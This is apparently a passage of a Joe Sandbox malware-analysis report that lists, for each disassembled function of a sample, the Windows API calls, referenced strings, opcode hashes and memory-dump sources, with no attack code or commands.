                                                                                                                                              • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                                                                                              • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                                                                                                              • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                                                                                              • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                                                                                                              APIs
                                                                                                                                              • CoInitialize.OLE32 ref: 0046C63A
                                                                                                                                              • CoUninitialize.OLE32 ref: 0046C645
                                                                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                                                                                                • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                                                                                              • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                                                                                              • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                                                                                              • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                                                                                              • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                                                                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                              • API String ID: 2294789929-1287834457
                                                                                                                                              • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                                                                                              • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                                                                                                              • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                                                                                              • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                                                                                                • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                                                                • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                                                                • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                                                              • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                                                                                              • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                                                                                              • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                                                                                              • ReleaseCapture.USER32 ref: 0047116F
                                                                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                                                                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                                                                              • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                              • API String ID: 2483343779-2107944366
                                                                                                                                              • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                                                                                              • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                                                                                                              • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                                                                                              • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                                                                                                              APIs
                                                                                                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                                                                                              • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                                                                                              • _wcslen.LIBCMT ref: 00450720
                                                                                                                                              • _wcscat.LIBCMT ref: 00450733
                                                                                                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                                                                                              • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Window_wcscat_wcslen
                                                                                                                                              • String ID: -----$SysListView32
                                                                                                                                              • API String ID: 4008455318-3975388722
                                                                                                                                              • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                                                              • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                                                                                                              • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                                                              • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                              • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                                                                                              • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                                                                                              • GetParent.USER32 ref: 00469C98
                                                                                                                                              • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                                                                                              • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                                                                                              • GetParent.USER32 ref: 00469CBC
                                                                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                              • API String ID: 2360848162-1403004172
                                                                                                                                              • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                                                                              • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                                                                                                              • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                                                                              • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 262282135-0
                                                                                                                                              • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                                                                              • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                                                                                                              • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                                                                              • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                                                                                                              APIs
                                                                                                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                                                                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                                                                                                              • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                                                                                                              • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                                                                                                              • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                                                                                                              • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                                                                                                              • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$LongWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 312131281-0
                                                                                                                                              • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                                                                              • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                                                                                                              • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                                                                              • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                                                                                              • SendMessageW.USER32(769523D0,00001001,00000000,?), ref: 00448E16
                                                                                                                                              • SendMessageW.USER32(769523D0,00001026,00000000,?), ref: 00448E25
                                                                                                                                                • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3771399671-0
                                                                                                                                              • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                                                                              • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                                                                                                              • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                                                                              • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                                                                                                              APIs
                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                                                                                                              • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                                                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2156557900-0
                                                                                                                                              • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                                                              • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                                                                                                              • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                                                              • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                              • API String ID: 0-1603158881
                                                                                                                                              • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                                                              • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                                                                                                              • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                                                              • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                                                                                                              APIs
                                                                                                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                                                                                                              • DestroyWindow.USER32(?), ref: 00426F50
                                                                                                                                              • UnregisterHotKey.USER32(?), ref: 00426F77
                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                                                                                              • String ID: close all$#v
                                                                                                                                              • API String ID: 4174999648-3101823635
                                                                                                                                              • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                                                                                                              • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                                                                                                              • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                                                                                                              • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                                                                                                              APIs
                                                                                                                                              • CreateMenu.USER32 ref: 00448603
                                                                                                                                              • SetMenu.USER32(?,00000000), ref: 00448613
                                                                                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                                                                                              • IsMenu.USER32(?), ref: 004486AB
                                                                                                                                              • CreatePopupMenu.USER32 ref: 004486B5
                                                                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                                                                                              • DrawMenuBar.USER32 ref: 004486F5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                              • String ID: 0
                                                                                                                                              • API String ID: 161812096-4108050209
                                                                                                                                              • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                                                              • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                                                                                                              • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                                                              • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                                                                                                              • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                                                                                                              • Opcode Fuzzy Hash: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                                                                                                              • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
